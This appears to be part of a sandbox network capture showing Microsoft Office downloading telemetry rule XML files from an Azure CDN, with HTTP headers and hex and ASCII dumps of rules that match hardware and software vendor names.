                                                                    2024-10-28 13:03:25 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    60192.168.2.44981113.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:25 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:25 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:25 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 420
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                    ETag: "0x8DC582B9DAE3EC0"
                                                                    x-ms-request-id: 892d3b27-201e-005d-7649-27afb3000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130325Z-16849878b78p49s6zkwt11bbkn00000004qg00000000cpxs
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:25 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    61192.168.2.44981513.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:25 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:26 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:26 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 423
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                    ETag: "0x8DC582BB7564CE8"
                                                                    x-ms-request-id: 5e4053db-f01e-0052-6472-279224000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130326Z-16849878b78bcpfn2qf7sm6hsn00000006rg00000000670t
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:26 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    62192.168.2.44981613.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:26 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:26 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:26 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 478
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                    ETag: "0x8DC582B9B233827"
                                                                    x-ms-request-id: 6856914c-401e-0029-0667-279b43000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130326Z-16849878b78km6fmmkbenhx76n00000004eg0000000072cu
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:26 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    63192.168.2.44981813.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:26 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:26 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:26 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 468
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                    ETag: "0x8DC582BB046B576"
                                                                    x-ms-request-id: 0ce3105a-501e-0029-7cd2-26d0b8000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130326Z-16849878b78qwx7pmw9x5fub1c000000036g00000000afes
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:26 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    64192.168.2.44981713.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:26 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:26 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:26 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 404
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                    ETag: "0x8DC582B95C61A3C"
                                                                    x-ms-request-id: 2897d81f-501e-005b-6528-26d7f7000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130326Z-r197bdfb6b4bq7nf8mnywhn9e00000000620000000009gbb
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:26 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    65192.168.2.44981913.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:26 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:26 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:26 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 400
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                    ETag: "0x8DC582BB2D62837"
                                                                    x-ms-request-id: a96fbf53-401e-0016-5d5d-2653e0000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130326Z-16849878b78nx5sne3fztmu6xc00000005z000000000dszu
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:26 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    66192.168.2.44982013.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:26 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:26 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:26 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 479
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                    ETag: "0x8DC582BB7D702D0"
                                                                    x-ms-request-id: 4900665d-501e-0029-5111-29d0b8000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130326Z-15b8d89586ffsjj9qb0gmb1stn00000009a0000000002mpm
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:26 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    67192.168.2.44982113.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:27 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:27 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:27 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 425
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                    ETag: "0x8DC582BBA25094F"
                                                                    x-ms-request-id: 2b9d96d3-301e-0020-4e31-276299000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130327Z-15b8d89586f989rkfw99rwd68g000000069000000000776g
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:27 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    68192.168.2.44982213.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:27 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:27 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:27 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 475
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                    ETag: "0x8DC582BB2BE84FD"
                                                                    x-ms-request-id: b14e1d55-401e-0078-709c-274d34000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130327Z-17c5cb586f67hfgj2durhqcxk80000000410000000000d68
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:27 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    69192.168.2.44982313.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:27 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:27 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:27 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 448
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                    ETag: "0x8DC582BB389F49B"
                                                                    x-ms-request-id: 84cbfce0-201e-0071-26f6-26ff15000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130327Z-17c5cb586f66g7mvbfuqdb2m3n0000000590000000000avc
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:27 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    70192.168.2.44982413.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:27 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:27 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:27 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 491
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                    ETag: "0x8DC582B98B88612"
                                                                    x-ms-request-id: 39d89106-201e-003f-20a3-266d94000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130327Z-16849878b78qwx7pmw9x5fub1c000000034g00000000fwy4
                                                                    x-fd-int-roxy-purgeid: 0
